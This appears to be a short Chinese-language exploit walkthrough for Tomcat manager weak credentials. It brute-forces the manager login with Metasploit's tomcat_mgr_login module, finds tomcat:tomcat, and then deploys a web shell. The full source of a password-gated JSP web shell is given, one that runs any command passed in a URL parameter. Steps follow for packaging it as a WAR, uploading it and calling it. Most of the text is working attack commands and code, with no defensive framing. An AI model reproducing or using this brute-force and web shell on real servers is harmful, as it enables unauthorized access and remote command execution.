影响版本
全版本
漏洞复现
msf爆破
use auxiliary/scanner/http/tomcat_mgr_login
设置IP和端口
set rhosts 10.7.10.41
set rport 8080(默认端口)
run运行
tomcat:tomcat
登陆成功
用大佬的jsp一句话马
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
然后把shell.jsp压缩成zip然后改后缀为1.war上传
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i
?pwd=123&i=ls(执行命令)
QQ:3075999532
参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html